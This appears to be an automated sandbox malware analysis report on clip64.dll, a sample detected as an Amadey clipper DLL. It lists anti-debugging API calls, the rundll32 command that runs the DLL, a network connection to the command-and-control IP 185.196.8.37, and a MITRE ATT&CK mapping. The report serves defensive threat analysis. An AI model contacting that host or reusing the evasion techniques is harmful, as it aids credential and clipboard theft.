        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D50A254 mov eax, dword ptr fs:[00000030h]14_2_6D50A254
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D50D218 GetProcessHeap,14_2_6D50D218
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D509820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_6D509820
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D506B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_6D506B1A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D507288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_6D507288

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.196.8.37 80Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D5070A7 cpuid 14_2_6D5070A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D5073F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_6D5073F8

        Stealing of Sensitive Information

        barindex
        Yara detected Amadeys Clipper DLL
        Source: Yara matchFile source: clip64.dll, type: SAMPLE
        Source: Yara matchFile source: 18.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading        		111
        Process Injection        		112
        Virtualization/Sandbox Evasion        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		111
        Process Injection        		LSASS Memory121
        Security Software Discovery        		Remote Desktop Protocol2
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information        		Security Account Manager112
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture11
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Rundll32        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1620555 Sample: clip64.dll Startdate: 21/02/2025 Architecture: WINDOWS Score: 100 23 Suricata IDS alerts for network traffic 2->23 25 Found malware configuration 2->25 27 Malicious sample detected (through community Yara rule) 2->27 29 5 other signatures 2->29 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 rundll32.exe 7->12         started        14 rundll32.exe 12 7->14         started        17 5 other processes 7->17 dnsIp5 31 System process connects to network (likely due to code injection or exploit) 9->31 33 Found potential dummy code loops (likely to delay analysis) 12->33 21 185.196.8.37, 49700, 49707, 80 SIMPLECARRER2IT Switzerland 14->21 19 rundll32.exe 17->19         started        signatures6 process7

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.